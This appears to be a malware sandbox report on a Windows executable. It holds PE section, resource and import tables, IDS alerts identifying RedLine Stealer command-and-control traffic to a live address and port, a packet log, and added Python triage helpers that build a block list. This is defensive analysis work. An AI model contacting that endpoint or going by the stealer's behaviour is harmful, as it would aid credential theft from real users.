.data | 0xa000 | 0x2a818 | 0x600 | 9a9bf385a30f1656fc362172b16d9268 | False | 0.5247395833333334 | data | 4.172601271908501 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata | 0x35000 | 0x10000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x45000 | 0x19998 | 0x19a00 | b1e7d2c3b950e480d836506eefb71360 | False | 0.04480754573170732 | data | 2.1832299456382547 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0x452c8 | 0x10828 | Device independent bitmap graphic, 128 x 256 x 32, image size 67584 | English | United States | 0.01134212705548326
RT_ICON | 0x55af0 | 0x4228 | Device independent bitmap graphic, 64 x 128 x 32, image size 16896 | English | United States | 0.023795465281058102
RT_ICON | 0x59d18 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9552 | English | United States | 0.03661825726141079
RT_ICON | 0x5c2c0 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | English | United States | 0.06167917448405253
RT_ICON | 0x5d368 | 0x833 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States | 0.6174368747022392
RT_ICON | 0x5dba0 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1072 | English | United States | 0.12588652482269502
RT_DIALOG | 0x5e008 | 0x100 | data | English | United States | 0.5234375
RT_DIALOG | 0x5e108 | 0x11c | data | English | United States | 0.6056338028169014
RT_DIALOG | 0x5e228 | 0x60 | data | English | United States | 0.7291666666666666
RT_GROUP_ICON | 0x5e288 | 0x5a | data | English | United States | 0.7666666666666667
RT_VERSION | 0x5e2e8 | 0x36c | data | English | United States | 0.45662100456621
RT_MANIFEST | 0x5e658 | 0x33e | XML 1.0 document, ASCII text, with very long lines (830), with no line terminators | English | United States | 0.5542168674698795
DLL | Import
ADVAPI32.dll | RegEnumValueW, RegEnumKeyW, RegQueryValueExW, RegSetValueExW, RegCloseKey, RegDeleteValueW, RegDeleteKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, RegOpenKeyExW, RegCreateKeyExW
SHELL32.dll | SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, SHFileOperationW, ShellExecuteExW
ole32.dll | CoCreateInstance, OleUninitialize, OleInitialize, IIDFromString, CoTaskMemFree
COMCTL32.dll | ImageList_Destroy, ImageList_AddMasked, ImageList_Create
USER32.dll | MessageBoxIndirectW, GetDlgItemTextW, SetDlgItemTextW, CreatePopupMenu, AppendMenuW, TrackPopupMenu, OpenClipboard, EmptyClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcW, GetMessagePos, CheckDlgButton, LoadCursorW, SetCursor, GetSysColor, SetWindowPos, GetWindowLongW, IsWindowEnabled, SetClassLongW, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassW, SystemParametersInfoW, CharPrevW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, FindWindowExW, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndPaint, CharNextA, wsprintfA, DispatchMessageW, CreateWindowExW, PeekMessageW, GetSystemMetrics
GDI32.dll | GetDeviceCaps, SetBkColor, SelectObject, DeleteObject, CreateBrushIndirect, CreateFontIndirectW, SetBkMode, SetTextColor
KERNEL32.dll | lstrcmpiA, CreateFileW, GetTempFileNameW, RemoveDirectoryW, CreateProcessW, CreateDirectoryW, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceW, WideCharToMultiByte, lstrcpynW, lstrlenW, SetErrorMode, GetVersionExW, GetCommandLineW, GetTempPathW, GetWindowsDirectoryW, WriteFile, CopyFileW, ExitProcess, GetCurrentProcess, GetModuleFileNameW, GetFileSize, GetTickCount, Sleep, SetFileAttributesW, GetFileAttributesW, SetCurrentDirectoryW, MoveFileW, GetFullPathNameW, GetShortPathNameW, SearchPathW, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalFree, GlobalAlloc, GetModuleHandleW, LoadLibraryExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, MultiByteToWideChar, ReadFile, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW, MulDiv, lstrcpyA, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, SetEnvironmentVariableW
Language of compilation system | Country where language is spoken | Map
English | United States |
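The section and resource rows above can be cross-checked arithmetically without touching the binary: resource data entries are normally laid out back to back after the directory tables, and a section's raw size, virtual size and entropy should agree with its characteristics flags. The following Python is an added example written for this page, not code from Joe Sandbox or from the sample; the rows are copied from the tables above, while the 8-byte resource alignment, the one-page virtual-over-raw slack and the 7.0 bits/byte entropy threshold are assumptions stated in the comments.

```python
"""Stdlib-only consistency checks over a sandbox report's section and resource rows:
do the declared resources tile the .rsrc section back to back with nothing left
over, and does any section's disk/memory/entropy profile contradict its flags?"""

# Rows copied from the section table above (only the two sections visible in this
# excerpt): name, virtual address, virtual size, raw size, entropy, characteristics.
SECTIONS = [
    (".ndata", 0x35000, 0x10000, 0x0, 0.0,
     "IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE"),
    (".rsrc", 0x45000, 0x19998, 0x19a00, 2.1832299456382547,
     "IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ"),
]
# Rows copied from the resource table above: type, RVA, size.
RESOURCES = [
    ("RT_ICON", 0x452c8, 0x10828), ("RT_ICON", 0x55af0, 0x4228),
    ("RT_ICON", 0x59d18, 0x25a8), ("RT_ICON", 0x5c2c0, 0x10a8),
    ("RT_ICON", 0x5d368, 0x833), ("RT_ICON", 0x5dba0, 0x468),
    ("RT_DIALOG", 0x5e008, 0x100), ("RT_DIALOG", 0x5e108, 0x11c),
    ("RT_DIALOG", 0x5e228, 0x60), ("RT_GROUP_ICON", 0x5e288, 0x5a),
    ("RT_VERSION", 0x5e2e8, 0x36c), ("RT_MANIFEST", 0x5e658, 0x33e),
]


def align_up(value, alignment):
    """Round value up to the next multiple of alignment (a power of two)."""
    return (value + alignment - 1) & ~(alignment - 1)


def resource_layout(resources, rsrc_va, rsrc_vsize, data_alignment=8):
    """Walk the resources in RVA order. Linkers place resource data entries back to
    back, each padded to data_alignment (assumed 8 here), after the directory tables
    at the start of .rsrc. A gap between entries, an entry outside the section, or a
    large unclaimed tail is where an appended or hidden blob would show up."""
    ordered = sorted(resources, key=lambda r: r[1])
    section_end = rsrc_va + rsrc_vsize
    gaps, outside = [], []
    for (name, rva, size), nxt in zip(ordered, ordered[1:] + [None]):
        if rva < rsrc_va or rva + size > section_end:
            outside.append((name, rva, size))
        if nxt is not None:
            expected = align_up(rva + size, data_alignment)
            if nxt[1] != expected:
                gaps.append((name, expected, nxt[1]))  # (after, expected RVA, actual RVA)
    _, last_rva, last_size = ordered[-1]
    return {
        "directory_bytes": ordered[0][1] - rsrc_va,  # bytes used by the directory tables
        "gaps": gaps,
        "outside_section": outside,
        "unclaimed_tail_bytes": section_end - (last_rva + last_size),
    }


def section_findings(sections, packed_entropy=7.0, page_slack=0x1000):
    """Flag sections whose on-disk size, in-memory size or entropy contradict their
    flags. Thresholds are assumptions: entropy >= 7.0 bits/byte is the usual packed or
    encrypted range, and one page of virtual-over-raw slack is normal alignment."""
    findings = []
    for name, _va, vsize, rawsize, entropy, chars in sections:
        bss_like = "IMAGE_SCN_CNT_UNINITIALIZED_DATA" in chars
        if rawsize == 0 and not bss_like:
            findings.append((name, "no bytes on disk but not flagged uninitialized"))
        if not bss_like and vsize > rawsize + page_slack:
            findings.append((name, "grows far beyond its raw size at load (unpacking target?)"))
        if entropy >= packed_entropy:
            findings.append((name, f"entropy {entropy:.2f} suggests packed/encrypted data"))
    return findings


if __name__ == "__main__":
    rsrc = next(s for s in SECTIONS if s[0] == ".rsrc")
    print(resource_layout(RESOURCES, rsrc[1], rsrc[2]))
    print(section_findings(SECTIONS))
```

For the rows on this page the resources are contiguous, start 0x2c8 bytes into .rsrc (the directory tables) and leave 2 unclaimed bytes at the section end, so nothing is hiding in the resource section; .ndata has no raw bytes but is flagged uninitialized, which is consistent rather than suspicious.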
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
04/26/24-02:42:01.151356 | TCP | 2046045 | ET TROJAN [ANY.RUN] RedLine Stealer/MetaStealer Family Related (MC-NMF Authorization) | 49730 | 18418 | 192.168.2.4 | 5.42.92.179
04/26/24-02:42:15.800330 | TCP | 2043231 | ET TROJAN Redline Stealer TCP CnC Activity | 49730 | 18418 | 192.168.2.4 | 5.42.92.179
04/26/24-02:42:01.413026 | TCP | 2043234 | ET MALWARE Redline Stealer TCP CnC - Id1Response | 18418 | 49730 | 5.42.92.179 | 192.168.2.4
04/26/24-02:42:06.716638 | TCP | 2046056 | ET TROJAN Redline Stealer/MetaStealer Family Activity (Response) | 18418 | 49730 | 5.42.92.179 | 192.168.2.4
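The Snort alerts and the packet list that follows describe one TCP session between the sandbox host and 5.42.92.179:18418. An analyst usually wants that collapsed into a flow record (packets per direction, session span, which IDS signatures fired on it, and whether each alert lines up with a captured packet) plus a block list. The following Python is an added triage helper written for this page, not code from Joe Sandbox; the embedded rows are copied from the Snort table and from a subset of the packet table on this page, with '|' column separators added, and the 1 ms alert-to-packet matching window is an assumption.

```python
"""Triage helper for a sandbox report's network tables: collapses the Snort alert
rows and the TCP packet rows into one record per flow and derives block-list IOCs."""
import ipaddress
from collections import defaultdict
from datetime import datetime, timedelta

# Rows copied from the Snort alert table and (a subset of) the TCP packet table on
# this page; '|' separators were added because the page prints the columns run
# together. Column order is the tables' own.
SNORT_ROWS = """\
04/26/24-02:42:01.151356|TCP|2046045|ET TROJAN [ANY.RUN] RedLine Stealer/MetaStealer Family Related (MC-NMF Authorization)|49730|18418|192.168.2.4|5.42.92.179
04/26/24-02:42:15.800330|TCP|2043231|ET TROJAN Redline Stealer TCP CnC Activity|49730|18418|192.168.2.4|5.42.92.179
04/26/24-02:42:01.413026|TCP|2043234|ET MALWARE Redline Stealer TCP CnC - Id1Response|18418|49730|5.42.92.179|192.168.2.4
04/26/24-02:42:06.716638|TCP|2046056|ET TROJAN Redline Stealer/MetaStealer Family Activity (Response)|18418|49730|5.42.92.179|192.168.2.4
"""
PACKET_ROWS = """\
Apr 26, 2024 02:42:00.592068911 CEST|49730|18418|192.168.2.4|5.42.92.179
Apr 26, 2024 02:42:00.853523970 CEST|18418|49730|5.42.92.179|192.168.2.4
Apr 26, 2024 02:42:00.853630066 CEST|49730|18418|192.168.2.4|5.42.92.179
Apr 26, 2024 02:42:00.861607075 CEST|49730|18418|192.168.2.4|5.42.92.179
Apr 26, 2024 02:42:01.122984886 CEST|18418|49730|5.42.92.179|192.168.2.4
Apr 26, 2024 02:42:01.151355982 CEST|49730|18418|192.168.2.4|5.42.92.179
Apr 26, 2024 02:42:01.413026094 CEST|18418|49730|5.42.92.179|192.168.2.4
Apr 26, 2024 02:42:06.716638088 CEST|18418|49730|5.42.92.179|192.168.2.4
Apr 26, 2024 02:42:12.635263920 CEST|18418|49730|5.42.92.179|192.168.2.4
"""


def parse_packet_ts(text):
    """'Apr 26, 2024 02:42:00.592068911 CEST' -> naive datetime. The zone is dropped
    (one report uses one zone) and nanoseconds are truncated to the microseconds a
    datetime can hold."""
    base, rest = text.split(".", 1)
    frac = rest.split(" ", 1)[0]
    dt = datetime.strptime(base, "%b %d, %Y %H:%M:%S")
    return dt.replace(microsecond=int(frac[:6].ljust(6, "0")))


def parse_snort_ts(text):
    """'04/26/24-02:42:01.151356' (Snort fast-alert format) -> naive datetime."""
    return datetime.strptime(text, "%m/%d/%y-%H:%M:%S.%f")


def flow_key(src_ip, src_port, dst_ip, dst_port):
    """Canonical (client_ip, client_port, server_ip, server_port) with the internal
    (RFC 1918) host as client, so both directions of a session map to one key.
    Returns the key and the packet direction relative to the internal host."""
    if ipaddress.ip_address(src_ip).is_private and not ipaddress.ip_address(dst_ip).is_private:
        return (src_ip, int(src_port), dst_ip, int(dst_port)), "out"
    return (dst_ip, int(dst_port), src_ip, int(src_port)), "in"


def summarize_flows(packet_rows=PACKET_ROWS, snort_rows=SNORT_ROWS, match_window_ms=1.0):
    """One record per flow: packets per direction, session span, IDS SIDs, and how
    many alerts line up with a captured packet (alert time within match_window_ms;
    the alert clock and the capture clock are assumed to be the same)."""
    flows = defaultdict(lambda: {"out": 0, "in": 0, "times": [], "alerts": []})
    for line in packet_rows.strip().splitlines():
        ts, sport, dport, sip, dip = line.split("|")
        key, direction = flow_key(sip, sport, dip, dport)
        flows[key][direction] += 1
        flows[key]["times"].append(parse_packet_ts(ts))
    for line in snort_rows.strip().splitlines():
        ts, _proto, sid, msg, sport, dport, sip, dip = line.split("|")
        key, _ = flow_key(sip, sport, dip, dport)
        flows[key]["alerts"].append((parse_snort_ts(ts), int(sid), msg))

    window = timedelta(milliseconds=match_window_ms)
    summary = {}
    for key, f in flows.items():
        times = sorted(f["times"])
        matched = sum(
            1 for ats, _, _ in f["alerts"] if any(abs(ats - pts) <= window for pts in times)
        )
        summary[key] = {
            "packets_out": f["out"],
            "packets_in": f["in"],
            "duration_s": round((times[-1] - times[0]).total_seconds(), 3) if times else 0.0,
            "alert_sids": sorted({sid for _, sid, _ in f["alerts"]}),
            "alerts_matched_to_packet": matched,
        }
    return summary


def block_list(summary):
    """Server endpoints to block or hunt for: every flow that carried an IDS alert."""
    return sorted(f"{ip}:{port}" for (_, _, ip, port), rec in summary.items() if rec["alert_sids"])


if __name__ == "__main__":
    flows = summarize_flows()
    for key, rec in flows.items():
        print(key, rec)
    print("block:", block_list(flows))
```

On the embedded rows this yields a single flow 192.168.2.4:49730 to 5.42.92.179:18418 with all four SIDs attached; three of the alerts coincide with a captured packet to the microsecond, while SID 2043231 fires at 02:42:15.8, past the packets embedded here. Feed the full packet table in the same delimited form to get the whole session span.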
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Apr 26, 2024 02:42:00.592068911 CEST | 49730 | 18418 | 192.168.2.4 | 5.42.92.179
Apr 26, 2024 02:42:00.853523970 CEST | 18418 | 49730 | 5.42.92.179 | 192.168.2.4
Apr 26, 2024 02:42:00.853630066 CEST | 49730 | 18418 | 192.168.2.4 | 5.42.92.179
Apr 26, 2024 02:42:00.861607075 CEST | 49730 | 18418 | 192.168.2.4 | 5.42.92.179
Apr 26, 2024 02:42:01.122984886 CEST | 18418 | 49730 | 5.42.92.179 | 192.168.2.4
Apr 26, 2024 02:42:01.151355982 CEST | 49730 | 18418 | 192.168.2.4 | 5.42.92.179
Apr 26, 2024 02:42:01.413026094 CEST | 18418 | 49730 | 5.42.92.179 | 192.168.2.4
Apr 26, 2024 02:42:01.465230942 CEST | 49730 | 18418 | 192.168.2.4 | 5.42.92.179
Apr 26, 2024 02:42:06.453449965 CEST | 49730 | 18418 | 192.168.2.4 | 5.42.92.179
Apr 26, 2024 02:42:06.716638088 CEST | 18418 | 49730 | 5.42.92.179 | 192.168.2.4
Apr 26, 2024 02:42:06.716732979 CEST | 18418 | 49730 | 5.42.92.179 | 192.168.2.4
Apr 26, 2024 02:42:06.716774940 CEST | 18418 | 49730 | 5.42.92.179 | 192.168.2.4
Apr 26, 2024 02:42:06.716793060 CEST | 49730 | 18418 | 192.168.2.4 | 5.42.92.179
Apr 26, 2024 02:42:06.716815948 CEST | 18418 | 49730 | 5.42.92.179 | 192.168.2.4
Apr 26, 2024 02:42:06.716861963 CEST | 49730 | 18418 | 192.168.2.4 | 5.42.92.179
Apr 26, 2024 02:42:06.977819920 CEST | 18418 | 49730 | 5.42.92.179 | 192.168.2.4
Apr 26, 2024 02:42:07.027604103 CEST | 49730 | 18418 | 192.168.2.4 | 5.42.92.179
Apr 26, 2024 02:42:07.699443102 CEST | 49730 | 18418 | 192.168.2.4 | 5.42.92.179
Apr 26, 2024 02:42:07.964498997 CEST | 18418 | 49730 | 5.42.92.179 | 192.168.2.4
Apr 26, 2024 02:42:08.011982918 CEST | 49730 | 18418 | 192.168.2.4 | 5.42.92.179
Apr 26, 2024 02:42:08.039150953 CEST | 49730 | 18418 | 192.168.2.4 | 5.42.92.179
Apr 26, 2024 02:42:08.300539970 CEST | 18418 | 49730 | 5.42.92.179 | 192.168.2.4
Apr 26, 2024 02:42:08.309715986 CEST | 49730 | 18418 | 192.168.2.4 | 5.42.92.179
Apr 26, 2024 02:42:08.571232080 CEST | 18418 | 49730 | 5.42.92.179 | 192.168.2.4
Apr 26, 2024 02:42:08.611561060 CEST | 49730 | 18418 | 192.168.2.4 | 5.42.92.179
Apr 26, 2024 02:42:08.873014927 CEST | 18418 | 49730 | 5.42.92.179 | 192.168.2.4
Apr 26, 2024 02:42:08.918240070 CEST | 49730 | 18418 | 192.168.2.4 | 5.42.92.179
Apr 26, 2024 02:42:08.996293068 CEST | 49730 | 18418 | 192.168.2.4 | 5.42.92.179
Apr 26, 2024 02:42:09.257664919 CEST | 18418 | 49730 | 5.42.92.179 | 192.168.2.4
Apr 26, 2024 02:42:09.259938955 CEST | 49730 | 18418 | 192.168.2.4 | 5.42.92.179
Apr 26, 2024 02:42:09.522983074 CEST | 18418 | 49730 | 5.42.92.179 | 192.168.2.4
Apr 26, 2024 02:42:09.547143936 CEST | 49730 | 18418 | 192.168.2.4 | 5.42.92.179
Apr 26, 2024 02:42:09.808466911 CEST | 18418 | 49730 | 5.42.92.179 | 192.168.2.4
Apr 26, 2024 02:42:09.809868097 CEST | 49730 | 18418 | 192.168.2.4 | 5.42.92.179
Apr 26, 2024 02:42:10.071161032 CEST | 18418 | 49730 | 5.42.92.179 | 192.168.2.4
Apr 26, 2024 02:42:10.096483946 CEST | 49730 | 18418 | 192.168.2.4 | 5.42.92.179
Apr 26, 2024 02:42:10.357877016 CEST | 18418 | 49730 | 5.42.92.179 | 192.168.2.4
Apr 26, 2024 02:42:10.402601004 CEST | 49730 | 18418 | 192.168.2.4 | 5.42.92.179
Apr 26, 2024 02:42:10.523066044 CEST | 49730 | 18418 | 192.168.2.4 | 5.42.92.179
Apr 26, 2024 02:42:10.784523010 CEST | 18418 | 49730 | 5.42.92.179 | 192.168.2.4
Apr 26, 2024 02:42:10.784593105 CEST | 49730 | 18418 | 192.168.2.4 | 5.42.92.179
Apr 26, 2024 02:42:10.784729004 CEST | 18418 | 49730 | 5.42.92.179 | 192.168.2.4
Apr 26, 2024 02:42:10.785135984 CEST | 18418 | 49730 | 5.42.92.179 | 192.168.2.4
Apr 26, 2024 02:42:10.785366058 CEST | 18418 | 49730 | 5.42.92.179 | 192.168.2.4
Apr 26, 2024 02:42:10.785589933 CEST | 18418 | 49730 | 5.42.92.179 | 192.168.2.4
Apr 26, 2024 02:42:11.045692921 CEST | 18418 | 49730 | 5.42.92.179 | 192.168.2.4
Apr 26, 2024 02:42:11.045986891 CEST | 18418 | 49730 | 5.42.92.179 | 192.168.2.4
Apr 26, 2024 02:42:11.046602011 CEST | 18418 | 49730 | 5.42.92.179 | 192.168.2.4
Apr 26, 2024 02:42:11.090102911 CEST | 49730 | 18418 | 192.168.2.4 | 5.42.92.179
Apr 26, 2024 02:42:11.119832993 CEST | 49730 | 18418 | 192.168.2.4 | 5.42.92.179
Apr 26, 2024 02:42:11.381148100 CEST | 18418 | 49730 | 5.42.92.179 | 192.168.2.4
Apr 26, 2024 02:42:11.388457060 CEST | 49730 | 18418 | 192.168.2.4 | 5.42.92.179
Apr 26, 2024 02:42:11.649406910 CEST | 18418 | 49730 | 5.42.92.179 | 192.168.2.4
Apr 26, 2024 02:42:11.649580002 CEST | 18418 | 49730 | 5.42.92.179 | 192.168.2.4
Apr 26, 2024 02:42:11.649750948 CEST | 18418 | 49730 | 5.42.92.179 | 192.168.2.4
Apr 26, 2024 02:42:11.650217056 CEST | 18418 | 49730 | 5.42.92.179 | 192.168.2.4
Apr 26, 2024 02:42:11.699465036 CEST | 49730 | 18418 | 192.168.2.4 | 5.42.92.179
Apr 26, 2024 02:42:11.845092058 CEST | 49730 | 18418 | 192.168.2.4 | 5.42.92.179
Apr 26, 2024 02:42:12.106098890 CEST | 18418 | 49730 | 5.42.92.179 | 192.168.2.4
Apr 26, 2024 02:42:12.106194019 CEST | 49730 | 18418 | 192.168.2.4 | 5.42.92.179
Apr 26, 2024 02:42:12.106408119 CEST | 18418 | 49730 | 5.42.92.179 | 192.168.2.4
Apr 26, 2024 02:42:12.106513023 CEST | 49730 | 18418 | 192.168.2.4 | 5.42.92.179
Apr 26, 2024 02:42:12.106518030 CEST | 18418 | 49730 | 5.42.92.179 | 192.168.2.4
Apr 26, 2024 02:42:12.106640100 CEST | 18418 | 49730 | 5.42.92.179 | 192.168.2.4
Apr 26, 2024 02:42:12.106652975 CEST | 49730 | 18418 | 192.168.2.4 | 5.42.92.179
Apr 26, 2024 02:42:12.106842041 CEST | 49730 | 18418 | 192.168.2.4 | 5.42.92.179
Apr 26, 2024 02:42:12.107300997 CEST | 18418 | 49730 | 5.42.92.179 | 192.168.2.4
Apr 26, 2024 02:42:12.107350111 CEST | 18418 | 49730 | 5.42.92.179 | 192.168.2.4
Apr 26, 2024 02:42:12.107403040 CEST | 18418 | 49730 | 5.42.92.179 | 192.168.2.4
Apr 26, 2024 02:42:12.107410908 CEST | 49730 | 18418 | 192.168.2.4 | 5.42.92.179
Apr 26, 2024 02:42:12.107455015 CEST | 49730 | 18418 | 192.168.2.4 | 5.42.92.179
Apr 26, 2024 02:42:12.107513905 CEST | 18418 | 49730 | 5.42.92.179 | 192.168.2.4
Apr 26, 2024 02:42:12.107572079 CEST | 49730 | 18418 | 192.168.2.4 | 5.42.92.179
Apr 26, 2024 02:42:12.107593060 CEST | 18418 | 49730 | 5.42.92.179 | 192.168.2.4
Apr 26, 2024 02:42:12.107639074 CEST | 49730 | 18418 | 192.168.2.4 | 5.42.92.179
Apr 26, 2024 02:42:12.107832909 CEST | 18418 | 49730 | 5.42.92.179 | 192.168.2.4
Apr 26, 2024 02:42:12.107894897 CEST | 49730 | 18418 | 192.168.2.4 | 5.42.92.179
Apr 26, 2024 02:42:12.108038902 CEST | 18418 | 49730 | 5.42.92.179 | 192.168.2.4
Apr 26, 2024 02:42:12.108108044 CEST | 49730 | 18418 | 192.168.2.4 | 5.42.92.179
Apr 26, 2024 02:42:12.108201981 CEST | 18418 | 49730 | 5.42.92.179 | 192.168.2.4
Apr 26, 2024 02:42:12.108319044 CEST | 18418 | 49730 | 5.42.92.179 | 192.168.2.4
Apr 26, 2024 02:42:12.108398914 CEST | 49730 | 18418 | 192.168.2.4 | 5.42.92.179
Apr 26, 2024 02:42:12.108611107 CEST | 18418 | 49730 | 5.42.92.179 | 192.168.2.4
Apr 26, 2024 02:42:12.108665943 CEST | 49730 | 18418 | 192.168.2.4 | 5.42.92.179
Apr 26, 2024 02:42:12.166327953 CEST | 18418 | 49730 | 5.42.92.179 | 192.168.2.4
Apr 26, 2024 02:42:12.367150068 CEST | 18418 | 49730 | 5.42.92.179 | 192.168.2.4
Apr 26, 2024 02:42:12.367228031 CEST | 18418 | 49730 | 5.42.92.179 | 192.168.2.4
Apr 26, 2024 02:42:12.367310047 CEST | 18418 | 49730 | 5.42.92.179 | 192.168.2.4
Apr 26, 2024 02:42:12.367492914 CEST | 18418 | 49730 | 5.42.92.179 | 192.168.2.4
Apr 26, 2024 02:42:12.367763996 CEST | 18418 | 49730 | 5.42.92.179 | 192.168.2.4
Apr 26, 2024 02:42:12.367821932 CEST | 18418 | 49730 | 5.42.92.179 | 192.168.2.4
Apr 26, 2024 02:42:12.367854118 CEST | 18418 | 49730 | 5.42.92.179 | 192.168.2.4
Apr 26, 2024 02:42:12.367954016 CEST | 18418 | 49730 | 5.42.92.179 | 192.168.2.4
Apr 26, 2024 02:42:12.368024111 CEST | 49730 | 18418 | 192.168.2.4 | 5.42.92.179
Apr 26, 2024 02:42:12.368136883 CEST | 49730 | 18418 | 192.168.2.4 | 5.42.92.179
Apr 26, 2024 02:42:12.368233919 CEST | 18418 | 49730 | 5.42.92.179 | 192.168.2.4
Apr 26, 2024 02:42:12.368454933 CEST | 18418 | 49730 | 5.42.92.179 | 192.168.2.4
Apr 26, 2024 02:42:12.368634939 CEST | 18418 | 49730 | 5.42.92.179 | 192.168.2.4
Apr 26, 2024 02:42:12.368825912 CEST | 18418 | 49730 | 5.42.92.179 | 192.168.2.4
Apr 26, 2024 02:42:12.368999958 CEST | 18418 | 49730 | 5.42.92.179 | 192.168.2.4
Apr 26, 2024 02:42:12.369132996 CEST | 18418 | 49730 | 5.42.92.179 | 192.168.2.4
Apr 26, 2024 02:42:12.369164944 CEST | 18418 | 49730 | 5.42.92.179 | 192.168.2.4
Apr 26, 2024 02:42:12.369343996 CEST | 18418 | 49730 | 5.42.92.179 | 192.168.2.4
Apr 26, 2024 02:42:12.369436979 CEST | 18418 | 49730 | 5.42.92.179 | 192.168.2.4
Apr 26, 2024 02:42:12.369534969 CEST | 18418 | 49730 | 5.42.92.179 | 192.168.2.4
Apr 26, 2024 02:42:12.369576931 CEST | 18418 | 49730 | 5.42.92.179 | 192.168.2.4
Apr 26, 2024 02:42:12.369755030 CEST | 18418 | 49730 | 5.42.92.179 | 192.168.2.4
Apr 26, 2024 02:42:12.369929075 CEST | 18418 | 49730 | 5.42.92.179 | 192.168.2.4
Apr 26, 2024 02:42:12.370126009 CEST | 49730 | 18418 | 192.168.2.4 | 5.42.92.179
Apr 26, 2024 02:42:12.370181084 CEST | 49730 | 18418 | 192.168.2.4 | 5.42.92.179
Apr 26, 2024 02:42:12.629314899 CEST | 18418 | 49730 | 5.42.92.179 | 192.168.2.4
Apr 26, 2024 02:42:12.629378080 CEST | 49730 | 18418 | 192.168.2.4 | 5.42.92.179
Apr 26, 2024 02:42:12.629904985 CEST | 18418 | 49730 | 5.42.92.179 | 192.168.2.4
Apr 26, 2024 02:42:12.630080938 CEST | 18418 | 49730 | 5.42.92.179 | 192.168.2.4
Apr 26, 2024 02:42:12.630486965 CEST | 18418 | 49730 | 5.42.92.179 | 192.168.2.4
Apr 26, 2024 02:42:12.630934000 CEST | 18418 | 49730 | 5.42.92.179 | 192.168.2.4
Apr 26, 2024 02:42:12.630989075 CEST | 18418 | 49730 | 5.42.92.179 | 192.168.2.4
Apr 26, 2024 02:42:12.631241083 CEST | 18418 | 49730 | 5.42.92.179 | 192.168.2.4
Apr 26, 2024 02:42:12.631469965 CEST | 18418 | 49730 | 5.42.92.179 | 192.168.2.4
Apr 26, 2024 02:42:12.631722927 CEST | 18418 | 49730 | 5.42.92.179 | 192.168.2.4
Apr 26, 2024 02:42:12.632283926 CEST | 18418 | 49730 | 5.42.92.179 | 192.168.2.4
Apr 26, 2024 02:42:12.632386923 CEST | 18418 | 49730 | 5.42.92.179 | 192.168.2.4
Apr 26, 2024 02:42:12.632504940 CEST | 18418 | 49730 | 5.42.92.179 | 192.168.2.4
Apr 26, 2024 02:42:12.632651091 CEST | 18418 | 49730 | 5.42.92.179 | 192.168.2.4
Apr 26, 2024 02:42:12.632685900 CEST | 18418 | 49730 | 5.42.92.179 | 192.168.2.4
Apr 26, 2024 02:42:12.632931948 CEST | 18418 | 49730 | 5.42.92.179 | 192.168.2.4
Apr 26, 2024 02:42:12.633238077 CEST | 18418 | 49730 | 5.42.92.179 | 192.168.2.4
Apr 26, 2024 02:42:12.633502007 CEST | 18418 | 49730 | 5.42.92.179 | 192.168.2.4
Apr 26, 2024 02:42:12.633673906 CEST | 18418 | 49730 | 5.42.92.179 | 192.168.2.4
Apr 26, 2024 02:42:12.633867025 CEST | 18418 | 49730 | 5.42.92.179 | 192.168.2.4
Apr 26, 2024 02:42:12.634088039 CEST | 18418 | 49730 | 5.42.92.179 | 192.168.2.4
Apr 26, 2024 02:42:12.634488106 CEST | 18418 | 49730 | 5.42.92.179 | 192.168.2.4
Apr 26, 2024 02:42:12.634643078 CEST | 18418 | 49730 | 5.42.92.179 | 192.168.2.4
Apr 26, 2024 02:42:12.634840965 CEST | 18418 | 49730 | 5.42.92.179 | 192.168.2.4
Apr 26, 2024 02:42:12.634951115 CEST | 49730 | 18418 | 192.168.2.4 | 5.42.92.179
Apr 26, 2024 02:42:12.635040045 CEST | 49730 | 18418 | 192.168.2.4 | 5.42.92.179
Apr 26, 2024 02:42:12.635145903 CEST | 18418 | 49730 | 5.42.92.179 | 192.168.2.4
Apr 26, 2024 02:42:12.635263920 CEST | 18418 | 49730 | 5.42.92.179 | 192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:12.635298014 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:12.635744095 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:12.635967016 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:12.636187077 CEST18418497305.42.92.179192.168.2.4
